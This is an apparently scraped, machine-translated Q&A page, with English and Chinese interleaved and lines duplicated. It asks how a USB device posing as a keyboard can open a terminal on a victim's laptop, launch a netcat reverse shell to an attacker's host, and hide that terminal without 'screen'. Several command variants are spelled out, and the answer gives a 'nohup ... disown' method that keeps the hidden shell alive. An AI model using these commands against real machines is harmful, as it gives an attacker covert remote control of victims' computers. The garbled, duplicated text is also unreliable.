[英]Hide a reverse shell terminal without screen
SCENARIO: the attacker insert into a victim's laptop an USB which acts as a keyboard.场景:攻击者将充当键盘的 USB 插入受害者的笔记本电脑。 The payload opens a terminal, executes a reverse shell and hides the terminal.
有效载荷打开一个终端,执行反向 shell 并隐藏终端。
PROBLEM: the tests I did locally (ubuntu 19.04, and digispark as usb) are the following:问题:我在本地进行的测试(ubuntu 19.04,和 digispark as usb)如下:
ONE一
terminal A nc -e /bin/bash 10.10.10.10 8888
终端A
nc -e /bin/bash 10.10.10.10 8888
terminal B nc -vlp 8888
终端 B
nc -vlp 8888
Everything works, I have my shell with the prompt on the terminal B but the terminal A is not hidden.一切正常,我的 shell 在终端 B 上有提示,但终端 A 没有隐藏。 Then it is useless in this case.
那么在这种情况下它是没有用的。
TWO二
terminal A nc -e /bin/bash 10.10.10.10 8888&; disown; exit
终端A
nc -e /bin/bash 10.10.10.10 8888&; disown; exit
nc -e /bin/bash 10.10.10.10 8888&; disown; exit
terminal B nc -vlp 8888
终端 B
nc -vlp 8888
terminal B just hangs and terminal A is hidden.终端 B 只是挂起,终端 A 被隐藏。 Useless.
无用。
THREE三
terminal A nohup nc -e /bin/bash 10.10.10.10 8888&; exit
终端A
nohup nc -e /bin/bash 10.10.10.10 8888&; exit
nohup nc -e /bin/bash 10.10.10.10 8888&; exit
terminal B nc -vlp 8888
终端 B
nc -vlp 8888
terminal B just hangs and terminal A is hidden终端 B 只是挂起,终端 A 被隐藏
FOUR四
terminal A: I open screen
then execute nc -e /bin/bash 10.10.10.10 8888
, CTRL^A
, then d
and finally exit
.终端 A:我打开
screen
,然后执行nc -e /bin/bash 10.10.10.10 8888
, CTRL^A
,然后d
,最后exit
。
terminal B nc -vlp 8888
终端 B
nc -vlp 8888
using screen
everything works (terminal B receives a working shell and terminal A isn't visible) but I don't want to use screen because it is not installed by default.使用
screen
一切正常(终端 B 接收到工作 shell 并且终端 A 不可见)但我不想使用 screen 因为它默认未安装。
QUESTION: is there a way ( using preinstalled tools ) to hidden the terminal without screen
but with the same effect?问题:有没有办法(使用预装的工具)隐藏没有
screen
但效果相同的终端?
nohup nc ...&; disown; exit
After the shell exits, the terminal will either logout or shutdown (depending on what kind of terminal it is), and send SIGHUP to the controlling process group, which would cause nc to exit. shell 退出后,终端将注销或关闭(取决于它是哪种终端),并向控制进程组发送 SIGHUP,这将导致 nc 退出。
Using nohup
detaches from the terminal and runs nc
in its own process group (so it will no longer be in the terminal's controlling process group), so the SIGHUP won't be sent to it.使用
nohup
会从终端分离并在其自己的进程组中运行nc
(因此它将不再位于终端的控制进程组中),因此不会将 SIGHUP 发送给它。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.